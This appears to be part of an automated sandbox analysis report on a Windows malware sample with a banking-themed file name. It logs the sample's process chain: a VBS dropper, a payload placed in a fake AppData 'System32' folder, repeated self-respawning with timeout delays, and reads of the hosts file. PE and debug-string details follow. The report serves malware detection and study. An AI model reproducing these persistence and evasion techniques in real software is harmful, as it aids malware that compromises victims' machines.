          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeReversingLabs: Detection: 10%
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeFile read: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe 'C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe'
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1448
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1476
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic file information: File size 1912320 > 1048576
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1b5a00
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbH{ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721117453.000000000458B000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733685179.0000000004F2D000.00000004.00000001.sdmp
          Source: Binary string: PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: ml.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.pdb99zz source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb> source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: bcrypt.pdb1 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb8 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB@Jh source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbtE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbkE source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: CLBCatQ.pdbC source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp
          Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: ole32.pdbX source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: rsaenh.pdb+ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdbY source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdbv source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb7 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: propsys.pdba source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb, source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbWS source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdbs source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb7cZ^ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: WLDP.pdbl source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb2 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbq source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: iVisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb, source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
